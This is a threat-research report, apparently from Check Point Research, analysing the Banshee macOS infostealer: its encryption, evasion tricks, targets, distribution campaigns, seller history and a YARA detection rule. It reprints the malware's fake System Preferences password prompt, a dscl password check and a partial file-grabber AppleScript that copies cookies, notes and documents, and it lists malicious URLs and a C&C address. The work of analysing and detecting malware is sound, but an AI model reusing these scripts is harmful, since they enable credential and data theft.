**Research by:** Antonis Terefos ( **@Tera0017**)
As of 2024, approximately 100.4 million people worldwide use macOS, accounting for 15.1% of the global PC market. Of the millions of macOS users, many falsely assume that their systems are inherently secure from malware. This perception stems from macOS’s Unix-based architecture and historically lower market share, making it a less attractive target for cyber criminals. While macOS includes robust security measures like Gatekeeper, XProtect, and sandboxing, no operating system is entirely immune to threats, making users’ false sense of security all the more dangerous.
As macOS’s popularity grows, attackers increasingly target the platform. Modern threats include sophisticated malware, phishing attacks, and malicious software like **Banshee**, a stealthy macOS stealer first made public in July 2024. The malware targets macOS users and steals browser and login credentials, cryptocurrency wallets, and sensitive information from files. From July to November, Banshee’s author ran a stealer-as-a-service operation on Telegram and on dark web forums such as XSS and Exploit, and continued to improve the malware. During this time, the author hired two members to carry out campaigns against macOS users.
In late September, **Check Point Research** identified a new, undetected version of Banshee Stealer targeting macOS. This updated version introduced string encryption, whereas previous versions contained all strings in plain text. Notably, Banshee’s author “stole” the string encryption algorithm from Apple’s macOS XProtect antivirus engine. Threat actors distributed this new version mainly via phishing websites and malicious GitHub repositories; in some GitHub campaigns they targeted both Windows and macOS users, with Lumma and Banshee Stealer respectively.
For over two months, this updated version of Banshee successfully evaded detection by most antivirus engines until its original code was leaked on XSS forums, allowing antivirus engines to detect its core functionality. Once the source code was leaked, the Banshee stealer-as-a-service operation was shut down to the general public. However, **Check Point Research** continues to observe campaigns distributing malware through phishing websites that masquerade as legitimate software.
In late September, **Check Point Research** obtained new versions of **Banshee Stealer**. The discovered samples remained undetected by antivirus engines on **VirusTotal** for over two months. Only once the Banshee Stealer **source code** was leaked on **November 23** on **XSS underground forums** did antivirus vendors update their detection rules to identify both the original leaked code and any updated versions.
Although the core functionality of both the older and newer versions remains unchanged, one key difference is the introduction of string encryption, which replaces the plain text strings from samples reported in August. When **Check Point Research** first obtained encrypted samples in late September, we created a Yara rule based on the string encryption, resulting in many false positives. However, upon further investigation, we discovered that Banshee employs the same encryption method that Apple utilizes in macOS for string encryption within its antivirus engine, XProtect. As previously noted by a researcher, this same encryption is used for _“encrypted YARA rules stored within the XProtect Remediator binaries”_.
Python representation:
```python
def macos_xprotect_string_decryption(encrypted: bytes, encr_key: int) -> str:
    """
    Author: @Check Point Research
    Decrypts MacOS Xprotect binaries & Banshee Stealer encrypted strings.
    """
    # (i * 8) & 0x38 selects a shift of 0, 8, ..., 56 bits that repeats every
    # eight bytes, so each byte is XORed with the little-endian key byte i % 8.
    decrypted = "".join(
        chr(((encr_key >> ((i * 8) & 0x38)) & 0xFF) ^ encrypted[i])
        for i in range(len(encrypted))
    )
    # The decrypted buffer is NUL-terminated; keep only the string itself.
    return decrypted.partition("\x00")[0]
```
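To make the scheme concrete, here is an added example (our code, not Banshee’s, Apple’s or the original post’s) built around the routine above. `decrypt_string()` gives the same result as the page’s Python representation; `encrypt_string()` and `recover_key()` are additions showing that the scheme is a plain 8-byte rolling XOR, so it is symmetric and eight bytes of known plaintext give back the key directly. The key value and the strings are constructed for the example, and the NUL padding to whole 8-byte words is our assumption about how such a string table is laid out.

```python
"""Rolling 64-bit XOR shared by XProtect Remediator and Banshee Stealer.

Added example for this write-up (not code from the original post, Apple or the
malware). decrypt_string() follows the page's Python representation; the rest
shows what the scheme implies for an analyst.
"""

from typing import Optional


def key_byte(encr_key: int, i: int) -> int:
    """Key byte covering position i.

    (i * 8) & 0x38 is a bit shift of 0, 8, ..., 56 that repeats every eight
    bytes, i.e. the little-endian byte i % 8 of the 64-bit key.
    """
    return (encr_key >> ((i * 8) & 0x38)) & 0xFF


def xor_rolling(data: bytes, encr_key: int) -> bytes:
    """Symmetric core: XOR every byte with its rolling key byte."""
    return bytes(b ^ key_byte(encr_key, i) for i, b in enumerate(data))


def decrypt_string(encrypted: bytes, encr_key: int) -> str:
    """Same result as the page's routine: decrypt, then cut at the first NUL."""
    plain = xor_rolling(encrypted, encr_key)
    return plain.split(b"\x00", 1)[0].decode("latin-1")


def encrypt_string(plaintext: str, encr_key: int) -> bytes:
    """Inverse of decrypt_string().

    Assumption (ours): the plaintext is NUL-terminated and padded to whole
    8-byte words, as a qword table would store it. Every padding byte then
    encrypts to the bare key byte, because 0x00 XOR k == k.
    """
    raw = plaintext.encode("latin-1") + b"\x00"
    raw += b"\x00" * (-len(raw) % 8)
    return xor_rolling(raw, encr_key)


def recover_key(encrypted: bytes, known_plaintext: str) -> Optional[int]:
    """Known-plaintext key recovery.

    With at least eight bytes of known plaintext each key byte is just
    ciphertext XOR plaintext; shorter inputs return None.
    """
    known = known_plaintext.encode("latin-1")
    if len(known) < 8 or len(encrypted) < 8:
        return None
    kb = bytes(encrypted[i] ^ known[i] for i in range(8))
    return int.from_bytes(kb, "little")


if __name__ == "__main__":
    # Constructed sample: a key and string chosen for this example, not taken
    # from a Banshee sample.
    key = 0x1122334455667788
    blob = encrypt_string("/dev/null", key)
    print("encrypted:", blob.hex())
    print("decrypted:", decrypt_string(blob, key))
    print("recovered key:", hex(recover_key(blob, "/dev/null") or 0))
```

Analyst takeaway: because XProtect uses the identical routine, a YARA rule keyed on this decryption pattern alone will also hit Apple’s own binaries, which is the false-positive problem described above. The known-plaintext property is what makes bulk string recovery from a sample cheap once a single decrypted string (a path such as `/dev/null`, a command) is known for a given key.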
While **XProtect** binaries decrypt YARA rules for detection purposes, **Banshee Stealer** uses the same algorithm to decrypt critical strings for its functionality. These strings include:
Upon decrypting the strings, we observed that Banshee’s core functionality remains largely unchanged; the updates mostly add anti-analysis techniques. The first technique calls `fork()`, creating a child process that a debugger attached to the parent will typically not follow. Before the parent terminates, it runs `killall Terminal` to close any open terminal sessions. Meanwhile, the child calls `setsid()` to detach into its own session in the background, mimicking a daemon so that it blends in with legitimate system processes. It then forks once more and the first child exits (a classic double fork, after which the surviving process cannot reacquire a controlling terminal). The final child checks whether it has read, write and execute access to the root directory; if the check fails, the infection stops, and if it succeeds, the process closes `stdin`, `stdout` and `stderr` and reopens them on `/dev/null`. This keeps the malware silent, so no output or error reaches the user, and leaves nothing for tools that monitor the process’s input and output.
Once those checks have been passed, **Banshee** retrieves the **HOME** and **TMP** directories and creates a ten-character directory within **TMP**. **HOME** is used to locate the user’s files and browser data, while the newly created directory under **TMP** stores the stolen data. At this stage, the malware behaves like the leaked code and previous versions. One notable change in the updated code, however, is the removal of the language check, which previously terminated the process if Russian was detected.
**Banshee** is a fully functional stealer capable of stealing credentials from several browsers, including:
In addition to browser credentials, the malware targets various browser extensions, primarily cryptocurrency wallets, and also the Two-Factor Authentication (2FA) extension `authenticator.cc – Authenticator`. All stolen browser data is stored in the directory `/tmp/$rand10char_dir/Browsers/`. Interestingly, some of these extensions no longer appear to exist, which leads us to believe that the end-of-life extension IDs were copied from earlier or other “stealer” projects. Banshee targets the following browser extensions (extension ID followed by the extension name):
```text
bhghoamapcdpbohphigoooaddinpkbai // "authenticator.cc – Authenticator"
fhbohimaelbohpjbbldcngcnapndodjp // "BNB Chain Wallet"
fihkakfobkmkjojpchpfgcmhfjnmnfpi // "BitAppWallet"
aodkkagnadcbobfpggfnjeongemjbjca // "BoltX"
aeachknmefphepccionboohckonoeemg // "coin98.com – Coin98 Wallet"
hnfanknocfeofbddgcijnmhnfnkdnaad // "wallet.coinbase.com – Coinbase Wallet extension"
agoakfejjabomempkjlepdflaleeobhb // "core.app – Core | Crypto Wallet & NFT Extension"
pnlfjmlcjdjgkddecgincndfgegkecke // "Cocobit"
blnieiiffboillknjnepogjhkgnoapac // "Equal"
cgeeodpfagjceefieflmdfphplkenlfk // "broxus.com EVER Wallet"
aholpfdialjgjfhomihkjbmgjidlcdno // "exodus.com – Exodus Web3 Wallet"
ebfidpplhabeedpnhjnobghokpiioolj // "fewcha.app – Fewcha Move Wallet"
cjmkndjhnagcfbpiemnkdpomccnjblmj // "koii.network – Finnie"
hpglfhgfnhbgpjdenjgmdgoeiappafln // "Guarda"
nanjmdknhkinifnkgdcggcfnhdaammmj // "GuildWallet"
fnnegphlobjdpkhecapkijjdkgcjhkib // "Harmony Chrome Extension Wallet"
flpiciilemghbmfalicajoolhkkenfel // "icon.foundation – ICONex"
cjelfplplebdjjenllpjcblmjkfcffne // "Jaxx Liberty"
jblndlipeogpafnldhgmapagcccfchpi // "Kaia Wallet"
pdadjkfkgcafgbceimcpbkalnfnepbnk // "KardiaChain Wallet"
dmkamcknogkgcdfhhbddcghachkejeap // "keplr.app – Keplr"
kpfopkelmapcoipemfendmdcghnegimn // "Liquality Wallet"
nlbmnnijcnlegkjjpcfjclmcfggfefdm // "MEW CX"
dngmlblcodfobpdpecaadgfbcggfjfnm // "multiversx.com – MultiversX Wallet"
efbglgofoippbgcjepnhiblaibcnclgk // "martianwallet.xyz – Martian Aptos & Sui Wallet Extension"
afbcbjpbpfadlkmhmclhkeeodmamcflc // "mathwallet.org – MathWallet"
nkbihfbeogaeaoehlefnkodbefgpgknn // "metamask.io – MetaMask"
ejbalbakoplchlghecdalmeeeajnimhm // "MetaMask"
fcckkdbjnoikooededlapcalpionmalo // "mobox.io – MOBOX WALLET"
lpfcbjknijpeeillifnkikgncikgfhdo // "Nami"
jbdaocneiiinmjbjlgalhcelgbejmnid // "Guarda"
fhilaheimglignddkjgofkcbgekhenbh // "oxygen.solutions – Oxygen – Atomic Crypto Wallet"
mgffkfbidihjpoaomajlbgchddlicgpn // "Pali Wallet"
ejjladinnckdgjemekebdpeokbikhfci // "petra.app – Petra Aptos Wallet"
bfnaelmomeimhlpmgjnjophhpkkoljpa // "phantom.app – Phantom"
phkbamefinggmakgklpkljjmgibohnba // "pontem.network – Pontem Crypto Wallet – Eth, Sol, BTC +"
fnjhmkhhmkbjkkabndcnnogagogbneec // "Ronin Wallet"
lgmpcpglpngdoalbgeoldeajfclnhafa // "safepal.com – SafePal Extension Wallet"
nkddgncdjgjfcddamfgcmfnlhccnimig // "GuildWallet"
pocmplpaccanhmnllbbkpgfliimjljgo // "Slope Wallet"
bhhhlbepdkbapadjdnnojkbgioiodbic // "solflare.com – Solflare Wallet"
fhmfendgdocmcbmfikdcogofphimnkno // "sollet"
mfhbebgoclkghebffdldpobeajmbecfk // "westar.io – StarMask"
cmndjbecilbocjfkibfbifhngkdmjgog // "swashapp.io – Swash"
ookjlbkiijinhpmnjffcofjonbfbgaoc // "Temple – Tezos Wallet"
aiifbnbfobpmeekipheeijimdpnlpgpp // "Station Wallet"
mfgccjchihfkkindfppnaooecgfneiii // "tokenpocket.pro – TokenPocket – Web3 & Nostr Wallet"
nphplpgoakhhjchkkhmiggakijnkhfnd // "TON Wallet"
ibnejdfjmmkpcnlpebklmnkoeoihofec // "TronLink"
egjidjbpglichdcondbcbdnbeeppgdph // "trustwallet.com – Trust Wallet"
amkmjjmmflddogmhpjloimipbofnfjih // "Wombat – Gaming Wallet for Ethereum & EOS"
hmeobnfnfcmdkdcmlblgagmfpfboieaf // "xdefi.io – XDEFI Wallet"
eigblbgjknlfbajkfhopmcojidlgcehm // "XMR.PT"
bocpokimicclpaiekenaeelehdjllofo // "XDCPay"
ffnbelfdoeiohenkjibnmadjiehjhajb // "yoroiwallet.com – Yoroi"
kncchdigobghenbbaddojjnnaogfppfj // "iWallet"
```
Once the browser data is dumped, Banshee proceeds to target wallets found on the machine. The stolen information is stored in `/tmp/$rand10char_dir/Wallets/`. The targeted wallets are:
The stealer collects various system information, using the following commands:

- Hardware and software profile: `system_profiler SPSoftwareDataType SPHardwareDataType`
- Public IP address: `curl -s api.ipify.org`
- The user’s password, requested through a fake System Preferences prompt: `osascript -e 'display dialog "To launch the application, you need to update the system settings \n\nPlease enter your password." with title "System Preferences" with icon caution default answer "" giving up after 30 with hidden answer'`
- `dscl /Local/Default -authonly`, which authenticates a username and password pair against the local directory node; paired with the prompt above, this lets the stealer verify that the password the victim typed is correct
This information is stored in `/tmp/$rand10char_dir/system_info.json` which also includes the campaign ID under the key `”BUILD_ID:”`.
The keychain passwords are stored in `/tmp/$rand10char_dir/Passwords/` and the code responsible for this functionality has remained unchanged since the leaked code.
The file-grabber functionality is performed using an AppleScript. The script is stored at `/tmp/$rand13char`. The code executed is shown below, with the output being stored at `/tmp/$rand10char_dir/FileGrabber/`.
```applescript
do shell script "osascript -e 'set volume with output muted'"
set baseFolderPath to (path to home folder as text) & " :" -- folder name not legible in the original post
set fileGrabberFolderPath to baseFolderPath & "FileGrabber:"
set notesFolderPath to baseFolderPath & "Notes:"
tell application "Finder"
    set username to short user name of (system info)
    if not (exists folder baseFolderPath) then
        do shell script "echo 'Creating base folder'"
        make new folder at (path to home folder) with properties {name:" } -- folder name not legible in the original post
    end if
    try
        do shell script "echo 'Creating FileGrabber folder'"
        make new folder at folder baseFolderPath with properties {name:"FileGrabber"}
        delay 2 -- Delay to give Finder time to create the folder
    end try
    try
        do shell script "echo 'Creating Notes folder'"
        make new folder at folder baseFolderPath with properties {name:"Notes"}
        delay 2 -- Delay to give Finder time to create the folder
    end try
    try
        do shell script "echo 'Copying Safari cookies'"
        set macOSVersion to do shell script "sw_vers -productVersion"
        if macOSVersion starts with "10.15" or macOSVersion starts with "10.14" then
            set safariFolder to ((path to library folder from user domain as text) & "Safari:")
        else
            set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
        end if
        duplicate file "Cookies.binarycookies" of folder safariFolder to folder fileGrabberFolderPath with replacing
        delay 2 -- Delay to give Finder time to copy the file
    end try
    try
        do shell script "echo 'Copying Notes database'"
        set homePath to path to home folder as string
        set sourceFilePath to homePath & "Library:Group Containers:group.com.apple.notes:NoteStore.sqlite"
        duplicate file sourceFilePath to folder notesFolderPath with replacing
        delay 2 -- Delay to give Finder time to copy the file
    end try
    set extensionsList to {"txt", "docx", "rtf", "doc", "wallet", "keys", "key"}
    try
        do shell script "echo 'Gathering desktop files'"
        set desktopFiles to every file of desktop
        repeat with aFile in desktopFiles
            try
                set fileExtension to name extension of aFile
                if fileExtension is in extensionsList then
                    set fileSize to size of aFile
                    if fileSize
-- (the script as reproduced in the original post is cut off here)
```

[Figure: download page offering “Download for Windows” and “Download for macOS”]
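For responders, here is an added example (our code, not the post’s or the malware’s) that turns the staging paths above into a triage check: it scans a temp root for a ten-character directory holding the `Browsers/`, `Wallets/`, `Passwords/` or `FileGrabber/` sub-directories or a `system_info.json` with a `BUILD_ID:` key, and reports the campaign ID when present. It assumes the random directory name is alphanumeric (the post only gives its length), and it builds its own fake staging tree to run against; `scan_tmp("/tmp")` would run the same check on a live host.

```python
"""Triage for Banshee Stealer staging directories under the temp root.

Added example for this write-up, not code from the original post or from the
malware. It checks for the on-disk layout the analysis describes: a
ten-character directory under the temp root holding Browsers/, Wallets/,
Passwords/ or FileGrabber/ sub-directories and a system_info.json whose
"BUILD_ID:" key carries the campaign ID. Assumptions (ours): the random name
is alphanumeric (the post only gives its length) and the scoring below.
"""

import json
import os
import re
import shutil
import tempfile
from dataclasses import dataclass, field
from typing import List, Tuple

STAGING_SUBDIRS = ("Browsers", "Wallets", "Passwords", "FileGrabber")
SYSINFO_NAME = "system_info.json"
BUILD_ID_KEY = "BUILD_ID:"  # key name as reported in the analysis
RAND_DIR_RE = re.compile(r"^[A-Za-z0-9]{10}$")  # assumption: alphanumeric


@dataclass
class Finding:
    path: str
    subdirs: List[str] = field(default_factory=list)
    build_id: str = ""

    @property
    def score(self) -> int:
        """One point per matching indicator; two or more is a strong match."""
        return len(self.subdirs) + (1 if self.build_id else 0)


def read_build_id(sysinfo_path: str) -> str:
    """Campaign ID from system_info.json, or '' if missing or unparsable."""
    try:
        with open(sysinfo_path, "r", encoding="utf-8") as fh:
            data = json.load(fh)
    except (OSError, ValueError):
        return ""
    value = data.get(BUILD_ID_KEY) if isinstance(data, dict) else None
    return str(value) if value else ""


def scan_tmp(tmp_root: str) -> List[Finding]:
    """Return every ten-character directory under tmp_root that carries at
    least one Banshee staging indicator."""
    findings: List[Finding] = []
    try:
        entries = os.listdir(tmp_root)
    except OSError:
        return findings
    for name in sorted(entries):
        full = os.path.join(tmp_root, name)
        if not (RAND_DIR_RE.match(name) and os.path.isdir(full)):
            continue
        present = [d for d in STAGING_SUBDIRS if os.path.isdir(os.path.join(full, d))]
        build_id = read_build_id(os.path.join(full, SYSINFO_NAME))
        if present or build_id:
            findings.append(Finding(full, present, build_id))
    return findings


def build_fixture(root: str) -> str:
    """Create a constructed staging tree (fake data) under root; returns its path."""
    staged = os.path.join(root, "aB3dE5fG7h")
    for d in ("Browsers", "Wallets", "Passwords"):
        os.makedirs(os.path.join(staged, d), exist_ok=True)
    with open(os.path.join(staged, SYSINFO_NAME), "w", encoding="utf-8") as fh:
        json.dump({BUILD_ID_KEY: "EXAMPLE_CAMPAIGN_ID", "hostname": "demo"}, fh)
    # Noise that must not be flagged: right length, none of the indicators.
    os.makedirs(os.path.join(root, "0123456789", "cache"), exist_ok=True)
    return staged


def demo() -> Tuple[str, List[Finding]]:
    """Build the fixture in a scratch directory, scan it and clean up."""
    root = tempfile.mkdtemp()
    try:
        staged = build_fixture(root)
        return staged, scan_tmp(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    staged, hits = demo()
    for f in hits:
        print(f"{f.path}: score={f.score} subdirs={f.subdirs} build_id={f.build_id}")
    # On a live host: for f in scan_tmp("/tmp"): ...
```

Treat a hit on the sub-directory layout and the `BUILD_ID:` key as a triage lead; the ten-character directory name alone is too weak an indicator, which is why the scan ignores directories that match only on the name.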
The second **Banshee stealer** campaign ID was `K1WDRRD8E2dHM7i2WFSHyN4DKG3v7q`, and the C&C was unchanged. Last time checked (December 10), the repositories still spread malware and remain undetected despite the fact that the `.dmg` file is unzipped and not password protected.
The **third campaign** took place around November 3 and also targeted both **Windows** and **macOS** users. The **Mac** release `Soft.Install.v1.4.zip` contained `Installer.dmg (Installer)`, which carried the malware. The bot communicated with the same C&C as the previous campaign but with ID `KAriWgOCQrqvyRSnPOnaE6UUBWjELA`. The **Lumma Stealer** release `ExtraModes_v1.6.zip (Setup.exe)` used nine C&C servers under the `.site` TLD, with further endpoints hosted on Steam. The threat actor behind this campaign uses two stealers: Lumma to target Windows and Banshee to target macOS.
Almost all repositories were created before they started pushing malware. The releases hosted two archives, one targeting Windows and the other MacOS.
**Check Point Research** successfully obtained multiple files from the new version of the **Banshee** Stealer which introduced string encryption for the first time on September 26th. Since then, we observed over 26 campaigns. Three of them were distributed via GitHub, though there may be more that have yet to be identified. The remaining campaigns appear to use different distribution methods. However, based on the filenames of the obtained files, they still impersonate popular software such as Chrome, TradingView, Zegent, Parallels, Solara, CryptoNews, MediaKIT, and Telegram.
**Check Point Research** collected all the samples, extracted the campaigns and the command and control servers, and obtained the file names masquerading as popular software. By generating the node graph below, we can distinguish two major clusters, primarily separated based on the distribution methods. The first major cluster, with C&C `41[.]216.183.49`, possibly distributed most of the Banshee stealer campaigns through malicious repositories commonly using filenames such as “Setup”, “Installer” and “Update”. The second cluster consists of multiple linked command and control servers that share the same “software” names, maintaining consistency across various campaigns and changes to the command and control servers.
One recent campaign from the second cluster, observed on December 3, impersonates a Telegram chat through a phishing website that directs the user to download a file. The website reads the User-Agent from the request and, if the visitor is on macOS, shows the download link and installation instructions. With Windows or Linux User-Agents, the malicious download link is not displayed. The malicious file is downloaded from `hxxps://api7[.]cfd/testet123t/Telegram.dmg`.
The HTML files `index.html` and `mobile.html` contain no malicious functionality other than reporting back to the threat actor via `sendNotification.php` that a user visited the phishing page, while `mac.html` serves the victim the link to download Banshee. The User-Agent check itself is implemented in client-side JavaScript on the page.
In this case, the threat actor is not performing dual infections of macOS and Windows users and is clearly interested only in macOS victims. How a victim arrives at the phishing website is currently unclear; however, users seeking cracked software or tools from illegitimate sources are the typical targets of such attacks. Similar phishing websites have been found distributing constantly updated `.dmg` files, as shown by the URLs and corresponding filenames below:
```text
- Telegram.dmg    hxxp://api7[.]cfd/testet123t/
- TradingView.dmg hxxps://coincapy[.]com/zx/
- MediaKIT.dmg    hxxps://fotor[.]software/MediaKIT
- Contract.dmg    hxxps://fotor[.]software/MacOS/Collaboration
```
Even though the Banshee stealer-as-a-service business has closed, threat actors are still using the updated versions and running new campaigns against macOS users. It is unclear whether the remaining campaigns originate from previous customers or whether Banshee’s creator is continuing to update the source code and using the malware within the private group recruited on XSS to conduct macOS campaigns.
On July 18, `@kolosain` created a Telegram channel and began selling the Banshee stealer for $2,999. Then, between August 13 and 15, the account `@0xe1`, the same actor behind the Telegram channel ( `@kolosain`), published on the XSS and Exploit forums, offering the Banshee macOS stealer as a service to a broader audience at a discounted price of $1,500 per month.
Between August 26 and 28, `@0xe1` started recruiting members for a small private group that would operate and perform campaigns. The seller offered the Banshee stealer and support to bypass Antivirus engines, starting with a 50% profit share for affiliates, which later increased to 60-65%. The recruitment was limited to only two spots, and `@0xe1` was searching for skilled actors with experience.
**Check Point Research** discovered the first version of Banshee Stealer using this new string encryption algorithm on September 26. Since then, campaigns using the old version have not been observed. On October 17, the author posted on XSS trying to sell the entire project for 1 BTC; soon after, the price dropped to $30,000. The timing suggests that the author may have been aware that the original source code had been leaked and was trying to sell the project quickly for cash.
Throughout this time, from October 10 to November 14, the stealer kept receiving updates, as the author’s forum posts about Banshee show.
By November 24, the author decided to close the service since the original source code of the Banshee Stealer was leaked the previous day. Since then, we discovered multiple campaigns mostly distributed through phishing websites. It is unclear if those campaigns are performed by the remaining customers or the author’s private group.
Shortly after the code leak, antivirus engines started detecting even the newest versions of Banshee, which included string encryption and new anti-analysis techniques. While this leak may help improve detection, it also poses the risk of creating multiple forks and new versions of Banshee being developed and distributed by different actors.
This relatively small code update of string encryption introduced by the developer of Banshee caused most antivirus engines to fail to detect this dangerous macOS infostealer for over two months. This illustrates the growing trend of threat actors targeting macOS users as well as the expansion of their arsenal and capabilities with malware and tools for different operating systems.
Malicious repositories on GitHub, which primarily target Windows users, have gradually extended their reach to macOS, Linux and Android. The surge in infections among Windows users led threat actors to replicate their attack chain for macOS, broadening the threat across multiple operating systems. While Windows malware was often distributed via password-protected archives on GitHub to evade detection, macOS disk images (DMG) and unprotected archives were shared openly on the platform.
Despite macOS traditionally being regarded as more secure, Banshee’s success demonstrates the importance for macOS users to remain vigilant. It is crucial for security solutions to evolve and provide better protection against increasingly sophisticated attacks as threat actors continue to expand their reach.
Operating systems and applications must be updated with timely patches and other means to mitigate the risks of threats like Banshee Stealer. Individuals should exercise caution when dealing with unexpected emails or messages containing links, particularly from unknown senders. Enhancing cybersecurity awareness among employees is also crucial, as it fosters a vigilant workforce. Lastly, consulting security specialists for any uncertainties can provide valuable expertise and guidance in navigating potential security challenges.
```yara
private rule macos_binary
{
    meta:
        author = "Antonis Terefos @Tera0017/@Check Point Research"
        descr = "MacOS file format"
    condition:
        // Mach-O 32-bit, Mach-O 64-bit and universal (fat) magics as read little-endian
        uint32(0) == 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xBEBAFECA
}

rule banshee_macos
{
    meta:
        author = "Antonis Terefos @Tera0017/@Check Point Research"
        descr = "Banshee MacOS stealer, encrypted strings version"
        sha256 = "ce371a92e905d12cb16b5c273429ae91d6ff5485dda04bfedf002d2006856038"
    strings:
        // x64
        $x64_code_str_decr1 = {80 E1 ?? (48|49) 89 (DE|F0|FE) (48|49) D3 (EE|E8) (40|44) 30 ?? 48 83 C2 08}
        $x64_code_str_decr12 = {0B 09 7D 92 2B 25 CB 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38}
        $x64_code_str_decr2 = {48 89 ?? 48 D3 [1-2] 30 ?? 48 83 C1 08 48 FF C?}
        $x64_code_str_decr3 = {81 30 [4] C6 40 04 00}
        $x64_code_str_decr4 = {2B 25 C8 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91}
        $x64_code_campid = {88 14 08 8A 54 31 02 48 FF C1 48 83 F9 1D}
        $x64_code_gen1 = {C6 40 09 00 31 C9 8A 14 08}
        $x64_code_gen2 = {88 14 31 8A 54 30 02 48 FF C6 84 D2}
        $x64_code_gen3 = {72 00 77 00 [30] 00 3B 00 00}
        // Arm
        $arm_code_str_decr1 = {0B 09 7D 92 2B 25 CB 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91}
        $arm_code_str_decr2 = {2B 25 C8 9A 4C 01 40 39 8B 01 0B 4A 4B 15 00 38 08 21 00 91}
        $arm_code_campid = {6C 01 09 8B 0A 69 29 38 8A 05 40 39 29 05 00 91 3F 79 00 F1}
        $arm_code_gen1 = {1F 24 00 39 08 00 80 D2}
        $arm_code_gen2 = {72 00 77 00 [30] 00 3B 00 00}
    condition:
        // Grouped explicitly: in YARA "and" binds tighter than "or", so without the
        // parentheses the Mach-O check would apply to the x64 branch only.
        macos_binary and (6 of ($x64_code*) or all of ($arm_code*))
}
```